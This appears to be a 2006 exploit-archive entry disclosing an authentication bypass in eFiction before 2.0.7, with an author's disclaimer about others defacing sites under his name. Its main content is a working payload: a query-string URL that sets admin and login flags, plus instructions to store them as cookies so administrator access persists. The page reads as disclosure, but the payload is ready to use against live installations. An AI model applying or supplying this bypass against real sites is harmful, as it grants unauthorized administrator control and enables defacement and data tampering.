eFiction < 2.0.7 Remote Admin Authentication Bypass Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : eFiction < 2.0.7 Remote Admin Authentication Bypass Vulnerability
# Published : 2006-08-25
# Author : Vipsta
# Previous Title : Mambo CopperminePhotoGalery Component Remote Include Vulnerability
# Next Title : Integramod Portal <= 2.0 rc2 (phpbb_root_path) Remote File Include

##########################################
# eFiction vulnerability
##########################################
# I am releasing this to the public. Vendor was notified. Someone is also illegally defacing 
these websites under MY name, which is a shame because they ripped it from a private discussion 
on g00ns.net. This proof of concept is not to be used to illegally hack websites. I do not condone, 
nor act in this type of activity. I suggest whomever is defacing websites under my name stop, 
since you would gain more notorioty under your own name.
##########################################

http://[target].com/efiction/index.php?adminloggedin=1&loggedin=1&level=1

Use firefox's extension "add n edit cookies" to add these to your cookies so they stick. 
(ie: instead of $_GET['loggedin'] its $_COOKIE['loggedin'] which stays with each page)

# www.Syue.com [2006-08-25]